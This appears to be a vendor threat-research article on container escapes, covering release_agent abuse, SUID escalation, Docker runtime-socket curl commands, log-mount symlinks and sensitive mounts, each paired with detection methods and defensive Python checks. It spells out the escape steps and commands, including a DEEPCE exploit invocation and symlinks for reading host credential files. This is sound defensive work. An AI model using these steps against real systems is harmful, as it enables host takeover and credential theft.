Container Breakouts: Escape Techniques in Cloud Environments

Executive Summary

This article reviews container escape techniques, assesses their possible impact and reveals how to detect these escapes from the perspective of endpoint detection and response (EDR).

As cloud services rise in popularity, so does the use of containers, which have become an integrated part of cloud infrastructure. Although containers provide many advantages, they are also susceptible to attack techniques like container escapes.

Many containers are internet-facing, which poses an even greater security risk. For example, an external attacker who has gained low-privilege access to a container will attempt to escape it through a variety of methods that include exploiting misconfigurations and vulnerabilities.

Container escapes are a notable security risk for organizations, because they can be a critical step in an attack chain that gives threat actors access to the underlying host. We previously published one such attack chain in an article about a runC vulnerability. In it, we discuss how attackers could exploit CVE-2019-5736 to gain root-level code execution and break out of a Docker container. Since then, organizations have disclosed a growing number of similar vulnerabilities that attackers could use to escape containers.

Palo Alto Networks customers are better protected from the container escape techniques we discuss in this article with our Cortex and Prisma Cloud solutions.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics: Container Escape, Containers, Docker, Kubernetes

What Is a Container?

In its simplest form, a container is basically a group of processes that compose an application, running in an isolated user space but sharing the same kernel space. This is in contrast to virtual machines, where the entire host is virtualized. We explain what an isolated user space means when we review how containers work.

In some cases, containers use actual virtualization instead of isolated user space, but those cases are not applicable to this article.

Why Do We Need Containers?

People use containers for efficient resource utilization because they allow the use of multiple systems on a single server. Containers achieve this by creating an isolated process tree, network stack, file system and various other user-space components using the namespace mechanism provided by the operating system.

The isolation within a container means an application can have its own tailored environment. Applications that could never run together can instead run within their own containers on the same server.

This approach allows a container to interact with its own set of user-space components that are abstracted from the host, thus creating an isolated user-space for every container. Hence, this enables applications within a container to operate as if they were running within a dedicated server. This feature is also the reason containers are ideal for microservices-based applications.

Containers are also highly portable, as they hold all necessary dependencies required for their operation and can seamlessly execute on any system running a supported container runtime.

Nonetheless, the container landscape brings challenges. Sharing the same kernel and often lacking complete isolation from the host's user-mode, containers are susceptible to various techniques employed by attackers seeking to escape the confines of a container environment. These techniques are collectively known as container escapes.

How Do Containers Work?

Before diving into the inner workings of containers, we should understand how the Linux operating system works. In Linux, when a process is spawned, it inherits its attributes from its parent process, including the following:

  • Permissions
  • Environment variables (unless explicitly defined)
  • Capabilities
  • Namespaces

Containers leverage this mechanism to produce an isolated process tree.
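As a small illustration of the inheritance described above, the following Python sketch sets an environment variable in a parent process and spawns a child that reads it back. The function name child_sees and the variable name DEMO_INHERITED are hypothetical and exist only for this example. It demonstrates inheritance of environment variables only, not of capabilities or namespaces.

```python
import os
import subprocess
import sys


def child_sees(var_name, value):
    """Set var_name in this process, spawn a child, return what the child reads."""
    os.environ[var_name] = value
    try:
        # No explicit env= argument: the child simply inherits the parent's environment.
        result = subprocess.run(
            [sys.executable, "-c",
             "import os, sys; print(os.environ.get(sys.argv[1], ''))",
             var_name],
            capture_output=True, text=True, check=True,
        )
    finally:
        os.environ.pop(var_name, None)  # leave the parent's environment as we found it
    return result.stdout.strip()


if __name__ == "__main__":
    print(child_sees("DEMO_INHERITED", "from-parent"))
```

A container runtime relies on the same behavior: whatever restrictions it applies to the first process in the container carry over to every process that process later spawns.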

The application responsible for creating and running containers is called the container runtime.

The container runtime is responsible for initiating a process and adjusting its attributes to limit and isolate not only the process itself but also all its child processes. The process is then renamed to init, executing the commands defined in the container configuration file.

Usually, the container runtime isn’t used directly. Instead, users work through an application such as a container CLI or a container orchestration system, which communicates with the container runtime on their behalf.

An example of a container CLI is Docker Engine, which uses containerd as the container runtime and a Dockerfile as the container configuration file. A popular example of a container orchestration system is Kubernetes, which can also use containerd as the container runtime.

The attributes that the container runtime modifies to perform process isolation include capabilities, namespaces, seccomp filters and cgroups, all of which appear later in this article.

While not all container engines leverage each of these attributes, many do.

To better understand how containers work, let's examine the example of two attributes particularly relevant to container isolation and privilege restriction: capabilities and namespaces.

Capabilities

According to the Linux manual page on capabilities:

Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.

Essentially, the capabilities attribute is a direct reflection of its name: the range of actions a process is capable of.

Linux implements a capabilities attribute because users and groups alone are too coarse a means of limiting processes. The capabilities attribute specifically restricts operations that processes with root privileges can perform.

Below, Figure 1 provides a comprehensive list of Linux capabilities.

The image displays a list of Linux capability constants in a terminal-like black background with white monospaced font, showing various system permissions such as 'cap_chown', 'cap_kill', 'cap_setuid', among others to configure system-level security.
Figure 1. List of available Linux capabilities.

As noted in Figure 1, even common operations like chown (cap_chown) or ptrace (cap_sys_ptrace) are part of the array of root operations that can be controlled using the capabilities mechanism. See the Linux manual page on capabilities for more information.

The logic is straightforward: removing a capability removes the ability to perform its corresponding operation, even with root privileges. For example, removing the cap_sys_ptrace capability renders a process incapable of executing the ptrace system call (syscall) on arbitrary other processes, regardless of the privilege level of the user launching the program.

By strategically removing unnecessary and high-privilege capabilities from the processes involved in container creation, the container engine can execute containers securely, even with root privileges. This security mechanism is made possible through the inheritable capabilities mechanism of Linux.

Regrettably, administrators may fail to remove all high-privilege capabilities when establishing a container using a container engine. In such instances, attackers can leverage these retained capabilities in various container escape methods, depending on the specific capabilities available to the process from within the container.
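To check which capabilities a containerized process has retained, one option is to decode the CapEff bitmask that Linux reports in /proc/[pid]/status. The Python sketch below does this under a few assumptions: the bit positions follow the capability numbering in the Linux kernel headers, and the HIGH_RISK set is our own illustrative selection, not an authoritative list.

```python
# Capability names indexed by bit position (bit 0 = cap_chown).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Illustrative only: capabilities we treat as worth a closer look in this sketch.
HIGH_RISK = {"cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_dac_read_search"}


def decode_caps(mask):
    """Return the set of capability names whose bit is set in mask."""
    return {name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1}


def effective_caps(status_text):
    """Extract and decode the CapEff line from /proc/[pid]/status content."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return decode_caps(int(line.split()[1], 16))
    return set()


if __name__ == "__main__":
    with open("/proc/self/status") as fh:
        caps = effective_caps(fh.read())
    print("high-risk capabilities retained:", sorted(caps & HIGH_RISK))
```

Running this inside a container and finding a non-empty high-risk list suggests the container was started with more privilege than most workloads need.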

Namespaces

According to the Linux manual page on namespaces:

A namespace wraps a global system resource in an abstraction that makes it appear to the processes within the namespace that they have their own isolated instance of the global resource. Changes to the global resource are visible to other processes that are members of the namespace, but are invisible to other processes. One use of namespaces is to implement containers.

In process management, if capabilities define what a process can do, then namespaces define where these actions can be performed. Essentially, namespaces provide a layer of abstraction that enables a process and its children to operate as if they possess their own exclusive instance within a global resource.

Various types of namespaces exist, each responsible for a distinct type of global resource within the operating system (OS).

One of the most straightforward namespaces to understand is the process identifier (PID) namespace. When an administrator or software creates a new PID namespace, the first process started inside it receives a PID of 1 within that namespace and acts as its init process. Processes created afterward in the namespace receive PIDs 2, 3, 4 and so on, regardless of the PIDs the host assigns to them.

Consider a scenario where a process runs with root privileges and possesses the cap_kill capability, enabling it to bypass permission checks and terminate almost any process. However, if this process operates within a new PID namespace, its ability to terminate processes is restricted to the processes within the same namespace. Other processes outside of this namespace are essentially non-existent to this original process with the cap_kill capability.

Namespaces essentially serve as a mechanism to enforce isolation, with additional features like capabilities and seccomp to prevent unwanted interference or escape to other namespaces.

Below, Figure 2 shows the available Linux namespaces, as detailed in the Linux man page on namespaces.

A table detailing namespaces in Linux, with columns for Namespace, Flag, Page, and Isolates. Rows include IPC, Network, Mount, PID, Time, User, and UTS, each paired with their corresponding flag, referenced manual page, and functional isolates.
Figure 2. List of available Linux namespaces with a short description.
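Linux exposes each process's namespace membership as symbolic links under /proc/[pid]/ns, so two processes share a namespace when the corresponding links have the same target. The Python sketch below compares two processes this way. The function names are hypothetical, and the proc_root parameter exists only so the logic can be exercised against a directory other than /proc.

```python
import os


def namespace_ids(pid="self", proc_root="/proc"):
    """Map namespace type (pid, net, mnt, ...) to its identifier for one process."""
    ns_dir = os.path.join(proc_root, str(pid), "ns")
    return {
        name: os.readlink(os.path.join(ns_dir, name))  # e.g. "pid:[4026531836]"
        for name in sorted(os.listdir(ns_dir))
    }


def shared_namespaces(a, b):
    """Return the namespace types that two namespace_ids() results have in common."""
    return sorted(name for name in a if a[name] == b.get(name))


if __name__ == "__main__":
    # Reading another process's ns directory may require elevated privileges.
    print(namespace_ids())
```

A containerized process that still shares the user or PID namespace with the host, for example, is less isolated than one with its own instance of each.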

Container Escapes

People may associate container escapes only with the ability to execute a program within the container on the host system. However, not all container escape techniques follow this paradigm. Container escape scenarios can also involve an attacker leveraging the container to steal data from the host or perform privilege escalation.

Let's review some examples of container escape techniques.

Example 1: User-Mode Helpers

Our first example is a collection of techniques called user-mode helpers. This example takes advantage of the call_usermodehelper kernel function, hence its name.

How the User-Mode Helper Attack Technique Works

Intended for drivers, the call_usermodehelper function prepares and initiates a user-mode application directly from the kernel, enabling the kernel to execute any program in user-mode with elevated privileges.

However, under specific conditions, users can cause a driver or other kernel-mode component to execute a user-mode program with the same escalated privileges. The term user-mode helpers encapsulates instances where the kernel executes a user-mode program defined in a user-mode file under these specific conditions.

Remarkably, an attacker can trick the kernel into running various programs with root privileges by creating and modifying certain files in user-mode. Although this requires root access, if an attacker gains control over a container with elevated privileges or an exploitable vulnerability, the attacker can easily perform the required actions.

User-Mode Helper: Release Agent

This user-mode helper technique leverages cgroups and their release_agent file to achieve a container escape. Cgroups (control groups) regulate the resources allocated to a process, providing the means to restrict resource usage. While we have reported a previous vulnerability affecting cgroups, this container escape method is not based on a vulnerability. Instead, an attacker with root privileges inside the container can employ this user-mode helper technique to escape it.

In this example, we use a technique originally presented by Brandon Edwards and Nick Freeman at Black Hat USA in 2019 [PDF] for a cgroup release_agent escape. By enabling a particular cgroup release_agent, an attacker can execute a program when the group is emptied. While Linux includes this feature for the proper cleanup of cgroups, the OS has no strict constraints, allowing the execution of any desired executable.

The implementation of this technique involves the following steps:

  1. Create and mount a directory, assigning it a cgroup.
  2. Establish a new group by creating a directory within the cgroup.
  3. Set the contents of the file notify_on_release to 1. This activates the user-mode helper mechanism (present in every new cgroup).
  4. Specify the absolute path of the executable in the release_agent file. This file, located in the root directory of every cgroup type, is shared among all cgroups. The absolute path of the root directory can be obtained by querying the /etc/mtab file from within the container as demonstrated below in Figure 3.
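  5. Trigger the release by letting the group become empty. Writing 0 to the group's cgroup.procs file moves the writing process into the group, and the group is empty again as soon as that process exits. As a result, even if the group was initially empty, the executable specified in release_agent will still be executed.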
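From a defender's point of view, one prerequisite of the steps above is a writable cgroup hierarchy of the kind that carries a release_agent file. The Python sketch below lists such mounts from mount-table text like the content of /etc/mtab. It assumes that the file system type cgroup denotes the legacy (v1) hierarchy, and the function name is hypothetical. Treat the result as one signal among several, since a sufficiently privileged container can also mount a new hierarchy itself.

```python
def writable_cgroup_v1_mounts(mtab_text):
    """Return mount points of cgroup (v1) file systems mounted read-write."""
    hits = []
    for line in mtab_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip blank or malformed lines
        _device, mount_point, fs_type, options = fields[:4]
        if fs_type == "cgroup" and "rw" in options.split(","):
            hits.append(mount_point)
    return hits


if __name__ == "__main__":
    with open("/etc/mtab") as fh:
        for mount_point in writable_cgroup_v1_mounts(fh.read()):
            print("writable cgroup v1 hierarchy:", mount_point)
```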

Below, Figure 3 shows an implementation of this technique using a concise sequence of shell commands.

Multiple lines of code in white, which includes various Linux terminal commands and a script aimed at modifying system settings and simulating a network attack.
Figure 3. Implementing release_agent escape using shell commands. Source: A compendium of container escapes - Brandon Edwards and Nick Freeman - Black Hat USA 19 [PDF].

This serves as an example of using a legitimate user-mode helper to escape a container with just the execution of a few shell commands.

Other user-mode helper techniques for container escape follow a similar pattern to this example. The key factor is that the ability to modify related files from inside the container provides the ability to execute any program with root privileges on the host system.

Our research indicates that user-mode helper techniques have the most potential impact. This is mainly due to the relative ease of container escape and the repercussions of a successful implementation.

How to Detect User-Mode Helper Attack Techniques

Detecting this array of techniques involves a systematic approach.

  1. Mapping call_usermodehelper calls: Begin by comprehensively cataloging all calls to call_usermodehelper made by the kernel.
  2. Identifying affected calls: Determine which call_usermodehelper calls are susceptible to manipulation by user-mode programs via files.
  3. Assessing container alteration: Investigate whether these files can be modified from within a container to execute a designated program.
  4. Monitoring user-mode helper files: Once the groundwork is done, the detection strategy entails monitoring modifications to the files associated with each user-mode helper. The focus is specifically on identifying changes originating from a user-mode program running within a container.

This multistep process enhances the ability to proactively detect and mitigate potential security risks associated with user-mode helper exploitation within containers.
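The final monitoring step can be sketched as a simple filter over file events. In the Python example below, the event dictionary layout (operation, path, in_container) is a hypothetical schema, and the pattern list is a short illustrative sample of files commonly associated with user-mode helpers, not the complete catalog that the first three steps would produce.

```python
import fnmatch

# Illustrative sample only; a real deployment would derive this list
# from the call_usermodehelper mapping described in the steps above.
HELPER_FILE_PATTERNS = [
    "*/release_agent",
    "/proc/sys/kernel/core_pattern",
    "/proc/sys/kernel/modprobe",
    "/sys/kernel/uevent_helper",
]


def is_suspicious_write(event):
    """Flag writes to user-mode helper files that originate inside a container."""
    if event.get("operation") != "write" or not event.get("in_container"):
        return False
    path = event.get("path", "")
    return any(fnmatch.fnmatchcase(path, pattern) for pattern in HELPER_FILE_PATTERNS)


if __name__ == "__main__":
    sample = {"operation": "write", "path": "/tmp/cgrp/release_agent", "in_container": True}
    print(is_suspicious_write(sample))
```

Restricting the rule to events that originate inside a container keeps legitimate host-side administration of these files from generating alerts.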

Real-World Detection of User-Mode Helper Attack Techniques

Below, Figure 4 shows Cortex XDR identifying an attempt to alter the release_agent file for a container escape using deepce.sh, a penetration testing tool from the DEEPCE repository.

The image is a flowchart illustrating a cybersecurity attack on a container technology system. It starts with a node labeled "yosef/Ubuntu-20/root" and ends with "deepce.sh", denoted by two red icons symbolizing danger or critical points. The process flows through several steps, linked by arrows: starting with 'CMD', moving through 'runC', and finally executing scripts 'bash' and 'deepce.sh'. Each node and transition is clearly labeled to indicate the sequence and nature of the actions within the system. Below the diagram, there is a command line instruction: "bin/sh ./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce".
Figure 4. Cortex XDR alert on an attempted release_agent container escape using DEEPCE.

Figure 4 presents a causality chain image of the alert in a Cortex XDR incident report that provides insight into the event. This alert reveals the process execution hierarchy of the specified tool and shows at which stage it detected the activity and prevented its execution. The Cortex XDR alert in Figure 4 also shows the command line of the tool to provide more context to its execution.

Example 2: Privilege Escalation Using SUID

Because container security is reinforced through mechanisms we previously covered in this article (such as capabilities, namespaces and seccomp), many containers are able to operate with root privileges on their hosts. This technique takes advantage of that.

How the SUID Attack Technique Works

This technique enables a user that already has limited permissions on the host to execute a program on the host with root privileges from within the container. This is not a full container escape, since the attacker must already have initial access to the host. But it allows such an attacker to perform actions on the host with root-level permissions even if the attacker initially has very limited permissions.

Attackers achieve this escalation because a SUID/SGID permission bit set on a file from within a container retains its effect outside of the container if that container operates in the same user namespace as the host. This is a common setup for many container environments.

Executing this attack requires the following:

  • A container running as root within the same user namespace as the host
  • An accessible directory from both the host and the container
  • A shell on the host
  • A shell on the container

An attacker using this technique performs the following steps:

  1. Create an executable file in an existing directory shared by the container and the host.
    The attacker can create the file from either the container or the host.
  2. Add the SUID permissions bit from inside the container.
  3. Execute the SUID binary from outside the container.

Once these steps are complete, the attacker’s executable file runs on the host with root privileges.

If the prerequisites have been met, this attack is easy for attackers because setting the SUID permissions bit on a file is a simple procedure. Just use the following chmod command:

chmod u+s filename
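To make the effect of that command concrete, the short Python sketch below applies the same change to a numeric file mode and prints the result in the familiar ls-style notation. It only manipulates mode values and does not touch any file. The helper name with_suid is hypothetical.

```python
import stat


def with_suid(mode):
    """Return mode with the set-user-ID bit (octal 4000) added, as chmod u+s does."""
    return mode | stat.S_ISUID


if __name__ == "__main__":
    before = stat.S_IFREG | 0o755  # a regular file with rwxr-xr-x permissions
    after = with_suid(before)
    print(stat.filemode(before), oct(stat.S_IMODE(before)))  # -rwxr-xr-x 0o755
    print(stat.filemode(after), oct(stat.S_IMODE(after)))    # -rwsr-xr-x 0o4755
```

The s in place of the owner's x marks a file that runs with its owner's privileges, which is root when root inside the container created it.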

How to Detect SUID Attack Techniques

Because this is a very specific attack technique, we can use a targeted approach to detection, focusing on key stages of the attack:

  • File creation: Monitor for the creation of a file intended for execution.
  • SUID/SGID bit modification: Detect the chmod operation within a container to add the SUID/SGID bit to a file within a directory shared by the container and its host.
  • File execution outside the container: Detect the instances where the file, now with the SUID/SGID bit set, is executed on the host by a non-root user.
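The last two stages lend themselves to a simple correlation over an event stream. The Python sketch below is a minimal illustration under stated assumptions: the event dictionaries (type, path, in_container, mode, uid) are a hypothetical schema, events arrive in chronological order, and every path has already been translated to its host path.

```python
def find_suid_escapes(events, shared_dirs):
    """Return host paths that were given a set-ID bit inside a container
    and later executed on the host by a non-root user."""
    flagged = set()
    alerts = []
    for ev in events:
        path = ev["path"]
        in_shared = any(
            path == d or path.startswith(d.rstrip("/") + "/") for d in shared_dirs
        )
        if not in_shared:
            continue
        if ev["type"] == "chmod" and ev["in_container"] and ev["mode"] & 0o6000:
            flagged.add(path)  # stage 2: SUID or SGID bit added from a container
        elif (ev["type"] == "exec" and not ev["in_container"]
              and ev["uid"] != 0 and path in flagged):
            alerts.append(path)  # stage 3: run on the host by a non-root user
    return alerts


if __name__ == "__main__":
    demo = [
        {"type": "chmod", "path": "/shared/sh", "in_container": True, "mode": 0o4755},
        {"type": "exec", "path": "/shared/sh", "in_container": False, "uid": 1000},
    ]
    print(find_suid_escapes(demo, ["/shared"]))
```

Alerting only on the combination of both stages is a design choice that trades some detection latency for fewer false positives than alerting on every chmod.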

Real-World Detection of SUID Attack Techniques

Figure 5 shows an alert from Cortex XDR detecting and blocking a container escape attempt using the SUID technique.

This image depicts a flowchart of a cybersecurity threat analysis, specifically highlighting a potential malware attack labeled "Container-escaping Protection" with steps involving various system commands like CGO, runc, bash, cp, and chmod, and showing actions to prevent the attack, all accompanied by a severity rating tagged as High. The panel also displays logos of source agents marked with Ubuntu and grouped actions including prevented (blocked).
Figure 5. Cortex XDR alert showing a container escape attempt using the SUID technique.

As shown in Figure 5, Cortex XDR alerted on a chmod command through a bash interface from the container's runtime environment (runc). This chmod command attempted to set the SUID permissions bit on a file in a directory shared by the container and the host.

Example 3: Runtime Sockets

Within the host environment, a container's infrastructure operates using a client/server model. As explained in documentation for container platforms like Docker, on one end, the container CLI serves as the client. On the other end, the container daemon functions as the server. Figure 6 provides a high-level overview of Docker architecture that helps illustrate the client/server nature of a container environment.

Diagram illustrating Docker architecture, including components such as Client, Docker Host, and Registry. The Client side displays command examples like 'docker run', 'docker build', and 'docker pull'. The Docker Host is represented with a Docker daemon, images, and containers showing different configurations. Registry shows NGINX with associated items such as a database symbol and folders marked 'Extensions' and 'Plugins'. Arrows indicate the flow of commands and data between these entities.
Figure 6. Docker infrastructure architecture. Source: Docker Docs.

The runtime libraries that implement this client/server infrastructure expose the API server, which handles communication between the client and the server, through Unix sockets called runtime sockets. Attackers can leverage this mechanism by interacting directly with the container's runtime socket from inside the container.

How the Runtime Sockets Attack Technique Works

This technique allows an attacker to create a new privileged container on the same host, then use that new container to escape to the host.

If a runtime socket is mounted inside a container, any process in that container that can reach the Unix socket file can send commands directly to the API server and thereby control the container runtime. An attacker with that control can easily create a new container to escape from and access the host.

An attacker can interact with the runtime socket through the Unix socket file in either of the following ways:

  • Through the container runtime CLI, by specifying the runtime socket as a parameter
  • Through a general-purpose executable like curl that can communicate over Unix sockets

The former approach allows an attacker to execute regular commands without the need for REST API calls. However, identifying the container runtime and obtaining its CLI inside the container could pose challenges.

Conversely, using common executables like curl presents an advantage, because these files already exist in most container environments. This eliminates the need to install an additional program to communicate to the API server, although this method requires more complex REST API commands.

Below are examples of curl commands using the Docker REST API to interact with the container runtime. In these examples, an attacker creates and starts a new container.

  • curl --unix-socket /var/run/docker.sock http://localhost/containers/json
    • Retrieves information on running containers (append ?all=true to include stopped ones)
  • curl -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{json_containing_container_configuration}' http://localhost/containers/create
    • Creates a container based on the specified JSON configuration (the -d option makes curl send a POST request)
  • curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/{container_id}/start
    • Starts the container specified by the {container_id}

Using this runtime socket technique, attackers can create a privileged container with a mount point to the host's root directory. Attackers can then escape from the newly created container through privileged access to the host's file system.
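Because the technique depends on a runtime socket being reachable from inside the container, a quick audit is to look for one. The Python sketch below checks a few well-known socket locations. The candidate list is an assumption that covers common defaults for Docker, containerd and CRI-O, and deployments may place their sockets elsewhere. The root parameter is only there so the check can be pointed at a different directory tree.

```python
import os
import stat

# Common default locations (an assumption; deployments can override these).
CANDIDATE_SOCKETS = [
    "/var/run/docker.sock",
    "/run/containerd/containerd.sock",
    "/var/run/crio/crio.sock",
]


def find_runtime_sockets(candidates=CANDIDATE_SOCKETS, root="/"):
    """Return the candidate paths that exist under root and are Unix sockets."""
    found = []
    for path in candidates:
        full = os.path.join(root, path.lstrip("/"))
        try:
            if stat.S_ISSOCK(os.stat(full).st_mode):
                found.append(path)
        except OSError:
            pass  # missing or inaccessible: not exposed at this location
    return found


if __name__ == "__main__":
    for sock in find_runtime_sockets():
        print("runtime socket reachable from this environment:", sock)
```

A non-empty result from inside a container means that any process in it that can write to the socket can drive the runtime as described above.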

How to Detect Runtime Sockets Attack Techniques

You can detect this form of attack in multiple ways:

  • Monitoring runtime Unix sockets: The most direct approach is to monitor requests made to the container runtime Unix sockets and verify they originate within the container. You can reduce false positives by filtering only impactful requests such as container creation and manipulation.
  • Unix socket file access detection: Another method entails detecting any access to the Unix socket file. However, this approach is susceptible to false positives, given the challenge of filtering out irrelevant instances without full request visibility.
  • CLI or curl command execution: Detection can also focus on identifying the execution of the container runtime CLI or a curl command using the container runtime socket from within the container. While effective, this method might not capture every instance of use.
  • Search attempt detection: An additional approach involves detecting attempts to search for the container runtime socket from within the container. Yet, like other methods, it may not provide thorough coverage.

To improve detection capabilities, you can employ a combination of these methods, thus offering a layered defense strategy for optimal coverage.
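For the first method, filtering down to impactful requests might look like the following Python sketch. It assumes Docker Engine API style paths with an optional version prefix, and the rule list is a small illustrative sample covering container creation, start and exec rather than a complete policy.

```python
import re

# (HTTP method, path pattern) pairs treated as impactful in this sketch.
IMPACTFUL = [
    ("POST", re.compile(r"^(/v[\d.]+)?/containers/create$")),
    ("POST", re.compile(r"^(/v[\d.]+)?/containers/[^/]+/(start|exec)$")),
    ("POST", re.compile(r"^(/v[\d.]+)?/exec/[^/]+/start$")),
]


def is_impactful(method, target):
    """Return True if the request creates, starts or execs into a container."""
    path = target.split("?", 1)[0]  # ignore the query string
    return any(
        method.upper() == rule_method and pattern.match(path) is not None
        for rule_method, pattern in IMPACTFUL
    )


if __name__ == "__main__":
    print(is_impactful("POST", "/containers/create?name=demo"))
    print(is_impactful("GET", "/containers/json"))
```

Read-only requests such as listing containers pass through without an alert, which is where most of the false-positive reduction comes from.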

Real-World Detection of Runtime Sockets Attack Techniques

Below, Figure 7 shows an alert from Cortex XDR detecting and preventing an attack using the penetration testing tool DEEPCE to escape a container through a mounted container socket using curl.

This image depicts a cybersecurity network flow diagram illustrating an attempted security breach. The diagram shows various components like a CGO box, an runc circle, an XORN Agent, and a bash shell all connected through directional arrows indicating the flow of the breach attempt towards a script named "deepce.sh." There's an alert icon with a high severity level and additional details such as "Prevented (blocked)" indicating the breach was stopped. The console at the bottom details the observed behaviors, showing categories like "Anomaly Detection" and "Container escaping Protection." Specific technical data, paths, and identifiers are laid out in a structured table format. The background shows a computer interface with a directory path "/yosef/Ubuntu-20/root." Essential details like timestamps, source tags, alongside a concise description of each module's activity, help give context to the security event depicted.
Figure 7. Cortex XDR alert showing a container escape attempt using the runtime socket technique.

Example 4: Log Mounts

This is a Kubernetes-specific attack, and it can more accurately be called a pod escape, since Kubernetes runs its containers inside pods and the attack uses a Kubernetes-specific feature to escape the container. Aqua Security published an insightful article on this technique in 2019.

How the Log Mount Attack Technique Works

This attack can grant an attacker within a pod read access to any directory or file on the host with root privileges. The requirements for this technique are as follows:

  1. Have access to a pod with a mount to the host's /var/log directory
  2. Have the capability to read logs using the Kubernetes interface
    1. This can be achieved as a regular Kubernetes user with log access
    2. Alternatively, you can employ a pod service account with log access

In the most favorable scenario, the logs will be accessible from inside the pod with the /var/log host mount.

The vulnerability lies in the way Kubernetes accesses pod logs. Each pod has a corresponding log file within /var/log, symbolically linked (symlink) to a log file located inside the container directory at /var/lib/docker/containers.

The flaw arises from how kubelet reads the symlink's contents without validating its destination. By manipulating the symlink destination from the log file to /etc/shadow, for example, an attacker can access the /etc/shadow file of the host.

The attack does not end there. When the Kubernetes kubectl command line tool requests logs over HTTP, the request behind the scenes specifies the targeted log file by its path relative to the /var/log directory. This means that if an attacker creates a symlink to the root directory from inside /var/log, the attacker gains read access to the entire file system with root permissions.

For instance, a symlink to the host’s root directory named root_host inside /var/log, coupled with an HTTP request specifying the log file root_host/etc/passwd, enables an attacker to retrieve the /etc/passwd file of the host.
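The underlying pattern, joining a base directory with a caller-supplied relative path and opening the result without checking where symlinks lead, can be reproduced safely in a throwaway directory. The Python sketch below is our own illustration of that pattern and is not kubelet code. Both function names are hypothetical, and the "host" tree lives entirely under a temporary directory.

```python
import os
import tempfile


def naive_read_log(log_dir, relative_path):
    """Join and open without validating symlink destinations (the flawed pattern)."""
    with open(os.path.join(log_dir, relative_path)) as fh:
        return fh.read()


def build_demo_tree():
    """Create <tmp>/etc/passwd and <tmp>/var/log/root_host -> <tmp>; return the log dir."""
    host_root = tempfile.mkdtemp()
    os.makedirs(os.path.join(host_root, "etc"))
    log_dir = os.path.join(host_root, "var", "log")
    os.makedirs(log_dir)
    with open(os.path.join(host_root, "etc", "passwd"), "w") as fh:
        fh.write("demo:x:1000:1000::/home/demo:/bin/sh\n")
    # The symlink an attacker would plant from a pod with /var/log mounted.
    os.symlink(host_root, os.path.join(log_dir, "root_host"))
    return log_dir


if __name__ == "__main__":
    print(naive_read_log(build_demo_tree(), "root_host/etc/passwd"), end="")
```

The requested path never leaves the log directory textually, yet the file that is opened lives outside it, which is why string checks on the request alone are not enough.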

Obtaining access to both a pod with /var/log mounted and a Kubernetes account with log reading capabilities is not an easy task, but it remains a possibility.

How to Detect Log Mount Attack Techniques

We can detect this form of attack in two ways:

  • HTTP request monitoring: Monitor all HTTP requests intended for reading logs and filter them for improper paths. However, this approach might not identify attacks that alter a legitimate log symlink.
  • Symlink creation/modification detection: Detect any symlink created or changed within the host's /var/log directory that originates from inside a pod. To implement this, we must ensure we detect write operations occurring in the /var/log directory of the host instead of the container.

To improve detection of these log mounts, we can combine these two detection methods.
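The symlink-based method can be approximated offline by scanning a log directory for links whose resolved destination falls outside an expected set of locations. In the Python sketch below, the function name and the allowed_targets parameter are hypothetical. The allow-list exists because, as noted earlier, legitimate pod log files are themselves symlinks into the container directory.

```python
import os


def escaping_symlinks(log_dir, allowed_targets=()):
    """Return (link, destination) pairs for symlinks under log_dir that resolve
    outside log_dir and outside every directory in allowed_targets."""
    roots = [os.path.realpath(log_dir)]
    roots += [os.path.realpath(p) for p in allowed_targets]
    hits = []
    # followlinks=False: report symlinked directories without descending into them.
    for dirpath, dirnames, filenames in os.walk(roots[0], followlinks=False):
        for name in dirnames + filenames:
            link = os.path.join(dirpath, name)
            if not os.path.islink(link):
                continue
            dest = os.path.realpath(link)
            if not any(os.path.commonpath([root, dest]) == root for root in roots):
                hits.append((link, dest))
    return hits


if __name__ == "__main__":
    for link, dest in escaping_symlinks("/var/log", ["/var/lib/docker/containers"]):
        print(f"{link} -> {dest}")
```

A periodic scan like this complements, but does not replace, real-time detection of the symlink being created from inside a pod.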

Real-World Detection of Log Mount Attack Techniques

Figure 8 shows an alert from Cortex XDR for detecting and preventing a container escape attempt from a Kubernetes pod using this technique. The alert shows an attempt to create a symlink in /var/log to access the host file system. This attempt uses a bash shell running the ln command to create the symlink.

A diagram of a cybersecurity process flow with four steps depicted as numbered circular icons connected by arrows. Each step is labeled with technological terms: "CGO," "runc," "bash," and "ln," representing different stages in a software security check. The diagram is displayed on a graphical user interface titled "yosef-Ubuntu-root" and features additional details such as timestamps, user paths, and security signatures. There's also a notification of a blocked action at the last step in a green box.
Figure 8. Cortex XDR alert data on a log mount escape attempt using /var/log.

Example 5: Sensitive Mounts

This technique focuses on mounted directories within a container that point to sensitive destinations like the host's /etc directory. These destinations are attractive to attackers because they can provide access to files with private information like the host's /etc/passwd file. These types of mounts are a misconfiguration, and we refer to these mount points as sensitive mounts.

Although this is merely taking advantage of a misconfiguration, this technique falls under the umbrella of container escape methods.

How the Sensitive Mount Attack Technique Works

The required action for this technique is merely to discover and access these sensitive mounts within misconfigured containers. For instance, an attacker might gain access to a container with a mount named /host_etc that accesses the host's /etc directory. By accessing /host_etc/passwd from the misconfigured container, the attacker has effectively accessed the host's /etc/passwd file.

This technique is the simplest way to escape a container, but it poses challenges for detection.

